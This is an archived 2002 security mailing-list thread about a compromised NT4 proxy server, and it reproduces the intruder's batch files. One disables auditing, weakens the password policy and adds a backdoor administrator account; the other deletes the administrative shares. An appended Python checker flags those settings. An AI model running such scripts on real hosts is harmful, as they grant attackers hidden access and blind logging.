RE: Proxy server hit... Any ideas?

From: ZeroBreak (ZeroBreakat_private)
Date: Wed Nov 20 2002 - 17:52:25 PST


    I have seen a lot of this. A bunch of script kiddies scanning for the
    most obvious holes. From some of the ones I've seen, it looked like
    some of them were using an automated script to do pretty much all of the
    work, others did it manually. Most of the servers were running serv-u ftp,
    an irc bot, and were pretty much being zombies.
    
    Obviously I would consider reinstalling and patching the system. It
    doesn't take long at all to reinstall NT and set up proxy. But if this is
    something you can't take down for a day or so, then I wouldn't consider
    it that big of a deal. Delete the stuff they installed and patch the
    system so they can't do it again. It wasn't solely an attack on your
    network, so you have a better chance of them not pilfering through all
    your data. More so just using it as another server to add to their list.
    Just look at what irc server & channel the bot connected to, you'll see
    all the others :).
    
    Have fun.
    
    	-- ZeroBreak
    
    -----Original Message-----
    From: Mike Cain [mailto:mikecat_private] 
    Sent: Monday, November 18, 2002 9:01 AM
    To: incidentsat_private
    Subject: Proxy server hit... Any ideas?
    
    
    Well, I have had my first run-in with a hacker, or was it a virus? I'm
    not 100% sure.. Guess I should start from the beginning...
    
    A few days ago, I began to get user complaints on the slowness of the
    internet. I figured it was mostly them just wanting something to
    complain about, so I did what all crappy admins do, I ignored it. Well,
    last night the box was rebooted after some software was updated. Today
    people were complaining about how PAINFULLY slow the internet was, so I
    looked at the proxy server. NT4 running proxy3. I know, there is newer
    better stuff, but it's what I have to work with. :) SO... I looked at the
    processes and noticed the CPU hovering at 35-50%.. Way too high. So a
    quick look at the process list showed two things that I didn't remember
    needing to be there, win.exe and start.exe. Next move was to find them,
    and they were in the winnt\system\ folder. What I also found odd was
    that there were three new folders in that directory all created on the
    8th, NT, tools, and win.
    
    Here are the contents, respectively.
    1. 1fg.dll, 1gno32.dll, 1s.dll, 1t.exe (antivirus sees this one as a
    backdoor Trojan), 132.dll, 1gn32.dll, 1idv32.dll, 1sf32.dll, 1ygwin1.dll
    (says it's a Cygwin POSIX Emulation DLL), 132.dll.bkup
    
    2. temp, servUDaemon.ini, services.exe, servUStartUpLog.txt, in,
    srvss.exe, start.exe, BugSlayerUtil.dll (says it's a Bugslayer Utility
    Routine), and _zoLibr.dll
    
    3. (folder) FL, cygwin.dll, MS.dll, secure.bat (see below), temp,
    x32.dll, cfg.dll, IGNo32.dll, secure1.bat (see below), pidv32.dll,
    win.exe, x32.dll.bkup
    
    SO, anyone know what I have or what hit me? From looking at the secure
    and secure1 batch files, it looks like a root kit... But I'm new at
    this side of security (I'm a Cisco guy...)
    
    Last thing, the logs show that the attacker was hitting the
    \scripts\sample\ folder... Meaning I think he was trying to use the old
    IIS Sample Scripts to execute local code... Not sure if he was
    successful...
    
    Thanks in advance!!
    
    Mike Cain
    CCNP/MCSE
    
    
    Secure.bat =
    @echo off
    del temp
    echo Compiling New Security Policy ...
    echo [Version] >> temp
    echo signature="$CHICAGO$" >> temp
    echo Revision=1 >> temp
    echo [Profile Description] >> temp
    echo Description=Default Security Settings. (Windows 2000 Professional) >> temp
    echo [System Access] >> temp
    echo MinimumPasswordAge = 0 >> temp
    echo MaximumPasswordAge = 42 >> temp
    echo MinimumPasswordLength = 0 >> temp
    echo PasswordComplexity = 0 >> temp
    echo PasswordHistorySize = 0 >> temp
    echo LockoutBadCount = 0 >> temp
    echo RequireLogonToChangePassword = 0 >> temp
    echo ClearTextPassword = 0 >> temp
    echo [Event Audit] >> temp
    echo AuditSystemEvents = 0 >> temp
    echo AuditLogonEvents = 0 >> temp
    echo AuditObjectAccess = 0 >> temp
    echo AuditPrivilegeUse = 0 >> temp
    echo AuditPolicyChange = 0 >> temp
    echo AuditAccountManage = 0 >> temp
    echo AuditProcessTracking = 0 >> temp
    echo AuditDSAccess = 0 >> temp
    echo AuditAccountLogon = 0 >> temp
    echo [Registry Values] >> temp
    echo machine\system\currentcontrolset\services\netlogon\parameters\signsecurechannel=4,1 >> temp
    echo machine\system\currentcontrolset\services\netlogon\parameters\sealsecurechannel=4,1 >> temp
    echo machine\system\currentcontrolset\services\netlogon\parameters\requirestrongkey=4,0 >> temp
    echo machine\system\currentcontrolset\services\netlogon\parameters\requiresignorseal=4,0 >> temp
    echo machine\system\currentcontrolset\services\netlogon\parameters\disablepasswordchange=4,0 >> temp
    echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\requiresecuritysignature=4,0 >> temp
    echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enablesecuritysignature=4,1 >> temp
    echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enableplaintextpassword=4,0 >> temp
    echo machine\system\currentcontrolset\services\lanmanserver\parameters\requiresecuritysignature=4,0 >> temp
    echo machine\system\currentcontrolset\services\lanmanserver\parameters\enablesecuritysignature=4,0 >> temp
    echo machine\system\currentcontrolset\services\lanmanserver\parameters\enableforcedlogoff=4,1 >> temp
    echo machine\system\currentcontrolset\services\lanmanserver\parameters\autodisconnect=4,15 >> temp
    echo machine\system\currentcontrolset\control\session manager\protectionmode=4,1 >> temp
    echo machine\system\currentcontrolset\control\session manager\memory management\clearpagefileatshutdown=4,0 >> temp
    echo machine\system\currentcontrolset\control\print\providers\lanman print services\servers\addprinterdrivers=4,0 >> temp
    echo machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0 >> temp
    echo machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >> temp
    echo machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0 >> temp
    echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0 >> temp
    echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0 >> temp
    echo machine\software\microsoft\windows\currentversion\policies\system\shutdownwithoutlogon=4,1 >> temp
    echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticetext=1, >> temp
    echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticecaption=1, >> temp
    echo machine\software\microsoft\windows\currentversion\policies\system\dontdisplaylastusername=4,0 >> temp
    echo machine\software\microsoft\windows nt\currentversion\winlogon\scremoveoption=1,0 >> temp
    echo machine\software\microsoft\windows nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp
    echo machine\software\microsoft\windows nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp
    echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatefloppies=1,0 >> temp
    echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatedasd=1,0 >> temp
    echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatecdroms=1,0 >> temp
    echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp
    echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp
    echo [Privilege Rights] >> temp
    echo seassignprimarytokenprivilege = >> temp
    echo seauditprivilege = >> temp
    echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
    echo sebatchlogonright = >> temp
    echo sechangenotifyprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >> temp
    echo secreatepagefileprivilege = *S-1-5-32-544 >> temp
    echo secreatepermanentprivilege = >> temp
    echo secreatetokenprivilege = >> temp
    echo sedebugprivilege = *S-1-5-32-544 >> temp
    echo sedenybatchlogonright = >> temp
    echo sedenyinteractivelogonright = >> temp
    echo sedenynetworklogonright = >> temp
    echo sedenyservicelogonright = >> temp
    echo seenabledelegationprivilege = >> temp
    echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp
    echo seincreasequotaprivilege = *S-1-5-32-544 >> temp
    echo seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501 >> temp
    echo seloaddriverprivilege = *S-1-5-32-544 >> temp
    echo selockmemoryprivilege = >> temp
    echo semachineaccountprivilege = >> temp
    echo senetworklogonright = %1 >> temp
    echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
    echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp
    echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
    echo sesecurityprivilege = *S-1-5-32-544 >> temp
    echo seservicelogonright = >> temp
    echo seshutdownprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp
    echo sesyncagentprivilege = >> temp
    echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp
    echo sesystemprofileprivilege = *S-1-5-32-544 >> temp
    echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
    echo setakeownershipprivilege = *S-1-5-32-544 >> temp
    echo setcbprivilege = >> temp
    echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >> temp
    echo Adding User %1 with the Password %2 ...
    net user /add slash 971985
    echo Adding slash to the Local Administrator Group ...
    net localgroup administrators slash /add
    echo Loading New Security Policy ...
    secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp
    echo System is now secure.
    
    
    
    Secure1.bat
    
    net share /delete C$ /y > net.deld
    net share /delete D$ /y >> net.deld
    net share /delete E$ /y >> net.deld
    net share /delete F$ /y >> net.deld
    net share /delete G$ /y >> net.deld
    net share /delete H$ /y >> net.deld
    net share /delete I$ /y >> net.deld
    net share /delete J$ /y >> net.deld
    net share /delete K$ /y >> net.deld
    net share /delete L$ /y >> net.deld
    net share /delete M$ /y >> net.deld
    net share /delete N$ /y >> net.deld
    net share /delete O$ /y >> net.deld
    net share /delete P$ /y >> net.deld
    net share /delete Q$ /y >> net.deld
    net share /delete R$ /y >> net.deld
    net share /delete S$ /y >> net.deld
    net share /delete T$ /y >> net.deld
    net share /delete U$ /y >> net.deld
    net share /delete V$ /y >> net.deld
    net share /delete W$ /y >> net.deld
    net share /delete X$ /y >> net.deld
    net share /delete Y$ /y >> net.deld
    net share /delete Z$ /y >> net.deld
    net share /delete ADMIN$ /y >> net.deld
    #net share /delete IPC$ /y >> net.deld
    del net.deld
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service. For
    more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
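The Secure.bat above builds a secedit security template that zeroes every audit category, drops the password policy and then adds an administrator. A defender triaging such a box wants to read the generated template rather than the batch file that writes it. The following is an added example, not code from the thread: a small parser for that INF-style template plus checks for the settings the posted script weakens. The sample template is constructed here from lines the script emits; the check list and the parameter-placeholder heuristic are this example's own assumptions.

```python
# Added example: audit a secedit-style security template (like the one the
# posted Secure.bat writes to 'temp') for settings that weaken the host.
# SAMPLE_TEMPLATE is constructed input mirroring lines from the thread.
SAMPLE_TEMPLATE = """\
[System Access]
MinimumPasswordLength = 0
PasswordComplexity = 0
LockoutBadCount = 0
[Event Audit]
AuditLogonEvents = 0
AuditAccountManage = 0
[Registry Values]
machine\\system\\currentcontrolset\\control\\lsa\\restrictanonymous=4,0
[Privilege Rights]
senetworklogonright = %1
"""

def parse_template(text):
    """Parse INF sections into {section: {lowercased key: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections

# (section, key or None for every key in the section, predicate, reason)
LSA = "machine\\system\\currentcontrolset\\control\\lsa\\"
CHECKS = [
    ("System Access", "minimumpasswordlength", lambda v: v == "0", "no minimum password length"),
    ("System Access", "passwordcomplexity", lambda v: v == "0", "password complexity off"),
    ("System Access", "lockoutbadcount", lambda v: v == "0", "account lockout disabled"),
    ("Event Audit", None, lambda v: v == "0", "audit category disabled"),
    ("Registry Values", LSA + "restrictanonymous", lambda v: v.endswith(",0"), "anonymous enumeration allowed"),
    ("Privilege Rights", None, lambda v: "%" in v, "unexpanded batch parameter: script-generated"),
]

def audit_template(text):
    """Return [(section, key, reason)] for every weakened or suspicious setting."""
    findings = []
    sections = parse_template(text)
    for section, key, is_weak, reason in CHECKS:
        for k, v in sections.get(section, {}).items():
            if (key is None or k == key) and is_weak(v):
                findings.append((section, k, reason))
    return findings
```

Run `audit_template(open("temp").read())` against a recovered template to list every audit category the script switched off before restoring your own policy with secedit.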
    
    
    



    This archive was generated by hypermail 2b30 : Fri Nov 22 2002 - 05:06:33 PST